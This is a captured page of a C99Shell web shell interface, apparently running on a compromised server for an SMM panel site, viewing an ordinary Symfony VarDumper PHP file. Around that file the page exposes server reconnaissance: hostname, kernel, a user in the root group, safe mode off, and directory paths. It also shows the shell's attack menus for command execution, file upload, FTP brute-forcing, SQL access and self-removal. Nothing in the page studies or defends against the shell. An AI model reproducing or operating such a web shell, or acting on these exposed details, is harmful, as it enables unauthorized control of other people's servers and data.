!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/symfony/var-dumper/Command/Descriptor/   drwxr-xr-x
Free 28.58 GB of 117.98 GB (24.23%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     HtmlDescriptor.php (3.61 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of the Symfony package.
 *
 * (c) Fabien Potencier <fabien@symfony.com>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Symfony\Component\VarDumper\Command\Descriptor;

use 
Symfony\Component\Console\Output\OutputInterface;
use 
Symfony\Component\VarDumper\Cloner\Data;
use 
Symfony\Component\VarDumper\Dumper\HtmlDumper;

/**
 * Describe collected data clones for html output.
 *
 * @author Maxime Steinhausser <maxime.steinhausser@gmail.com>
 *
 * @final
 */
class HtmlDescriptor implements DumpDescriptorInterface
{
    private 
$dumper;
    private 
$initialized false;

    public function 
__construct(HtmlDumper $dumper)
    {
        
$this->dumper $dumper;
    }

    public function 
describe(OutputInterface $outputData $data, array $contextint $clientId): void
    
{
        if (!
$this->initialized) {
            
$styles file_get_contents(__DIR__.'/../../Resources/css/htmlDescriptor.css');
            
$scripts file_get_contents(__DIR__.'/../../Resources/js/htmlDescriptor.js');
            
$output->writeln("<style>$styles</style><script>$scripts</script>");
            
$this->initialized true;
        }

        
$title '-';
        if (isset(
$context['request'])) {
            
$request $context['request'];
            
$controller "<span class='dumped-tag'>{$this->dumper->dump($request['controller'], true, ['maxDepth' => 0])}</span>";
            
$title sprintf('<code>%s</code> <a href="%s">%s</a>'$request['method'], $uri $request['uri'], $uri);
            
$dedupIdentifier $request['identifier'];
        } elseif (isset(
$context['cli'])) {
            
$title '<code>$ </code>'.$context['cli']['command_line'];
            
$dedupIdentifier $context['cli']['identifier'];
        } else {
            
$dedupIdentifier uniqid(''true);
        }

        
$sourceDescription '';
        if (isset(
$context['source'])) {
            
$source $context['source'];
            
$projectDir $source['project_dir'] ?? null;
            
$sourceDescription sprintf('%s on line %d'$source['name'], $source['line']);
            if (isset(
$source['file_link'])) {
                
$sourceDescription sprintf('<a href="%s">%s</a>'$source['file_link'], $sourceDescription);
            }
        }

        
$isoDate $this->extractDate($context'c');
        
$tags array_filter([
            
'controller' => $controller ?? null,
            
'project dir' => $projectDir ?? null,
        ]);

        
$output->writeln(<<<HTML
<article data-dedup-id="$dedupIdentifier">
    <header>
        <div class="row">
            <h2 class="col">
$title</h2>
            <time class="col text-small" title="
$isoDate" datetime="$isoDate">
                
{$this->extractDate($context)}
            </time>
        </div>
        
{$this->renderTags($tags)}
    </header>
    <section class="body">
        <p class="text-small">
            
$sourceDescription
        </p>
        
{$this->dumper->dump($datatrue)}
    </section>
</article>
HTML
        );
    }

    private function 
extractDate(array $contextstring $format 'r'): string
    
{
        return 
date($format, (int) $context['timestamp']);
    }

    private function 
renderTags(array $tags): string
    
{
        if (!
$tags) {
            return 
'';
        }

        
$renderedTags '';
        foreach (
$tags as $key => $value) {
            
$renderedTags .= sprintf('<li><span class="badge">%s</span>%s</li>'$key$value);
        }

        return <<<HTML
<div class="row">
    <ul class="tags">
        
$renderedTags
    </ul>
</div>
HTML;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0054 ]--